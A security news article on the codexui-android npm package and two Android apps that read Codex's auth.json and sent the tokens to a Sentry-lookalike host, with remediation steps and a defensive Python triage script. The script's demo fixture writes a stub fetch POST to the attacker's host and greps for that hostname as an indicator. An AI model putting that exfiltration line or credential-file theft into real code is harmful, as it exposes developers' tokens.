npm Package Steals OpenAI Codex Tokens for a Month

A popular npm package for OpenAI Codex has been stealing developer authentication tokens for the past month. The package, codexui-android, had roughly 29,000 weekly downloads and looked legitimate, with an active GitHub repository and a steady development history. But since version 0.1.82, every run of the package has silently read ~/.codex/auth.json and sent its contents to an attacker-controlled server.

The stolen data includes access tokens, refresh tokens, ID tokens, and account IDs. According to Aikido Security researcher Charlie Eriksen, “The refresh_token doesn’t expire. An attacker holding it can silently impersonate you indefinitely.”

How the Attack Worked

What made the attack effective was not technical complexity but where the code lived. The GitHub repository remained clean; the malicious code existed only in the published npm package, so anyone who audited the repository rather than the artifact actually installed would find nothing wrong. The injected code reads Codex's ~/.codex/auth.json, a plaintext credential cache created whenever a user logs in via the Codex app, CLI, or IDE extension, and sends its contents to sentry.anyclaw[.]store, a hostname chosen to resemble Sentry, the legitimate error-tracking platform, so that the exfiltration would pass for ordinary error telemetry.

The exfiltration code was introduced roughly a month after the package was first published, a common pattern: accumulate downloads and trust first, ship the payload later. The infrastructure, however, was in place from the start. WHOIS records show the exfiltration domain was registered on 12 April 2026, two days after the first package version (0.1.72) was uploaded to npm. The malicious code appeared from version 0.1.82 onward.

The Same Attack from the Play Store

The npm package was not the only delivery vector. An Android app called OpenClaw Codex Claude AI Agent, published by BrutalStrike, ran the same npm package inside a PRoot sandbox on users’ devices. The app had more than 50,000 downloads on Google Play. A second BrutalStrike app, simply called Codex, had over 10,000 downloads and contained the same exfiltration chain. Because neither app pinned a specific npm package version, they automatically pulled the malicious code the moment it went live.

Combined reach: roughly 29,000 weekly npm downloads plus more than 60,000 Google Play installs. The two figures are not directly comparable (one is a weekly rate, the other a cumulative count), and download counts include CI re-installs and mirrors, so they bound rather than measure the number of affected developers. Even so, this is one of the more significant credential-theft campaigns targeting AI developer tooling.

The Author’s Shifting Story

The npm account behind the package belongs to “friuns,” identified by Aikido as Igor Levochkin. When confronted on GitHub, the author initially claimed to have lost access to the npm account, then edited the response to say they were “currently investigating this issue internally.” Levochkin said no credential data was shared with third parties, but did not explain why the exfiltration code was inserted only into the npm build, or why access to users’ Codex tokens was needed. The X profile linked to the account includes the domain anyclaw[.]store—the same domain to which the stolen tokens were sent.

A Growing Pattern

This attack arrives amid escalating threats to AI developer tooling. Last month, a poisoned VS Code extension installed by a GitHub employee led to the exfiltration of 3,800 of GitHub's own internal repositories. That attack harvested 1Password vault contents, Claude Code configurations, and AWS credentials.

As AI coding tools become essential infrastructure, the authentication tokens they generate, often stored in plaintext, are high-value targets. OpenAI's own documentation warns developers to treat ~/.codex/auth.json like a password. This campaign shows the limit of that advice: the file is readable by any process running under the developer's account, which includes every npm package the developer installs or runs, so a careful user is no defence against a malicious dependency.

What You Should Do Now

  1. Check whether codexui-android is installed. Run npm ls codexui-android in each project and repeat with the -g flag for global installs; also search package-lock.json files, since a transitive dependency will not appear in your own package.json. If either BrutalStrike Android app is on a device, uninstall it.
  2. If found, assume the tokens are already in the attacker's hands. Codex sign-in tokens are OAuth tokens, not API keys, so rotating API keys alone does not help: log out of all sessions in your OpenAI account security settings so the refresh token is invalidated server-side, and rotate any API keys you also use.
  3. Only then delete ~/.codex/auth.json and re-authenticate. Deleting the local file by itself does nothing to the attacker's copy; the refresh token remains usable until the session is revoked.
  4. Monitor your OpenAI account for usage you did not generate, and search proxy or DNS logs for connections to anyclaw[.]store.
  5. Pin exact versions (no ^ or ~ ranges), commit the lockfile, and install with npm ci so a new upstream release cannot enter a build silently. Pinning would not have protected anyone who installed 0.1.82 or later directly, but it is exactly what the BrutalStrike apps lacked.
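A scripted version of the checks above, together with a search for the indicator from the How the Attack Worked section. This is an added example, not code from Aikido Security, OpenAI, or the package author. It assumes the standard npm package.json and package-lock.json layouts (v1 "dependencies" or v2/v3 "packages"), treats 0.1.82 and later as known-malicious per the article, and scans a constructed sample project rather than real data.

```python
# Triage helper for the codexui-android incident (added example, not Aikido's, OpenAI's or the author's code).
import json
import os
import re
import tempfile
from collections import namedtuple

PACKAGE = "codexui-android"
FIRST_BAD_VERSION = "0.1.82"        # first malicious release, per the article
IOC_HOST = b"sentry.anyclaw.store"  # exfil host, written anyclaw[.]store in the text

Finding = namedtuple("Finding", "path kind detail")   # kind: "manifest" | "lockfile" | "ioc"

def parse_version(spec):
    """'^0.1.82' -> (0, 1, 82); range prefixes dropped, non-numeric parts count as 0."""
    return tuple(int(m.group()) if (m := re.match(r"\d+", p)) else 0
                 for p in spec.strip().lstrip("^~=v").split("."))

def is_known_bad(version):
    """True for 0.1.82 and every later release."""
    return parse_version(version) >= parse_version(FIRST_BAD_VERSION)

def is_pinned(spec):
    """Only an exact x.y.z (optionally '=x.y.z') is pinned; ^ and ~ ranges float."""
    return re.fullmatch(r"=?\d+\.\d+\.\d+", spec.strip()) is not None

def scan_manifest(path):
    """Report the package in any package.json dependency section and whether it is pinned."""
    with open(path, encoding="utf-8") as f:
        manifest = json.load(f)
    out = []
    for section in ("dependencies", "devDependencies", "optionalDependencies"):
        spec = manifest.get(section, {}).get(PACKAGE)
        if spec is not None:
            note = ("UNPINNED range, floats to the newest matching release" if not is_pinned(spec)
                    else "pinned to a KNOWN MALICIOUS version" if is_known_bad(spec)
                    else "pinned below the malicious release")
            out.append(Finding(path, "manifest", f"{section}: {spec} ({note})"))
    return out

def scan_lockfile(path):
    """Read resolved versions from package-lock.json (v1 'dependencies' or v2/v3 'packages')."""
    with open(path, encoding="utf-8") as f:
        lock = json.load(f)
    versions = set()
    for key, entry in lock.get("packages", {}).items():
        if key.rsplit("node_modules/", 1)[-1] == PACKAGE:   # also catches nested copies
            versions.add(entry.get("version", "?"))
    if PACKAGE in lock.get("dependencies", {}):
        versions.add(lock["dependencies"][PACKAGE].get("version", "?"))
    return [Finding(path, "lockfile", f"resolved {v}: "
                    + ("KNOWN MALICIOUS" if is_known_bad(v) else "predates the malicious release"))
            for v in sorted(versions)]

def scan_node_modules(root):
    """Grep installed JS/JSON for the exfil hostname, whichever package carries it."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith((".js", ".cjs", ".mjs", ".json")):
                full = os.path.join(dirpath, name)
                try:
                    with open(full, "rb") as f:
                        if IOC_HOST in f.read():
                            out.append(Finding(full, "ioc", f"contains {IOC_HOST.decode()}"))
                except OSError:
                    continue
    return out

def scan_project(project_dir):
    """Run all three checks against one project directory."""
    manifest, lockfile, node_modules = (os.path.join(project_dir, n) for n in
                                        ("package.json", "package-lock.json", "node_modules"))
    findings = []
    if os.path.isfile(manifest):
        findings += scan_manifest(manifest)
    if os.path.isfile(lockfile):
        findings += scan_lockfile(lockfile)
    if os.path.isdir(node_modules):
        findings += scan_node_modules(node_modules)
    return findings

def demo():
    """Build a constructed sample project (not real data) in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "package.json"), "w") as f:
            json.dump({"dependencies": {PACKAGE: "^0.1.72"}}, f)   # caret range floats to 0.1.82+
        with open(os.path.join(tmp, "package-lock.json"), "w") as f:
            json.dump({"lockfileVersion": 3, "packages": {f"node_modules/{PACKAGE}": {"version": "0.1.83"}}}, f)
        dist = os.path.join(tmp, "node_modules", PACKAGE, "dist")
        os.makedirs(dist)
        with open(os.path.join(dist, "index.js"), "wb") as f:   # constructed stand-in for the payload
            f.write(b"fetch('https://sentry.anyclaw.store/api', {method: 'POST'})")
        return scan_project(tmp)

if __name__ == "__main__":
    for finding in demo():
        print(f"[{finding.kind}] {finding.path}: {finding.detail}")
```

Point scan_project at a real checkout instead of the constructed sample to triage it. The manifest check illustrates step 5: a caret range such as ^0.1.72 is what lets a clean install silently resolve to 0.1.82 or later, which is why the lockfile, not package.json, tells you which version you actually have. The hostname grep is deliberately not limited to the package directory, because the same payload could be bundled into another dependency.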